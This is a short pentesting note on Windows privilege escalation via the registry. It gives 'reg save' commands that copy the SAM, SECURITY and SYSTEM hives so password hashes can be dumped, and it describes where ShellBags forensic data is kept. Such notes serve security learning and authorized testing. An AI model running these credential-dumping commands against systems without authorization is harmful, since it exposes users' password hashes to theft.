Exploit Notes

Windows PrivEsc with Registry Keys

Last modified: 2023-02-08

Privilege Escalation Windows

The Windows Registry is a hierarchical database that stores low-level settings for Windows and for applications that opt to use the registry. Registry keys are container objects, which contain values and subkeys. These similar to folders.

Registry Hives

A hive is a logical group of keys, subkeys, and values in the registry that has a set of supporting files loaded into memory when the operating system is started or a user logs in.

If we can access to registries and get registry hives, the password hashes can be dumped.
Copy three hives (SAM, SECURITY, SYSTEM) to arbitrary direcotyr where we can access.

# save: Saves a copy of specified subkeys, entries, and values of the registry in a specified file.
reg save HKLM\sam c:\Users\<user>\Desktop\sam.save
reg save HKLM\security c:\Users\<user>\Desktop\security.save
reg save HKLM\system c:\Users\<user>\Desktop\system.save

After that, we can dump password hashes using these three file (sam.save, security.save, system.save).
See the details in here.


ShellBags

A set of registry keys that store details about a viewed folder, such as its size, position, and icon.

Location

c:\Users\<username>\AppData\Local\Microsoft\Windows\UsrClass.dat

If we cannot found AppData folder in Explorer, click "View" tab and check "Hidden Items".

Access to Shellbag**

  1. Search "regedit" on search bar and open "Registry Editor"

  2. Go to "Computer\HKEY_CLASSES_ROOT\LocalSettings\Software\Microsoft\Windows\Shell\Bags"

ShellBags Explorer

Extract ShellBags information.

  1. Open "ShellBags Explorer"

  2. Select "File" -> "Load offline hive"

  3. Navigate to the UsrClass.dat and open the file

  4. Find suspicious folder and file

Tools by HDKS

Fuzzagotchi

Automatic web fuzzer.

aut0rec0n

Auto reconnaissance CLI.

Hash Cracker

Hash identifier.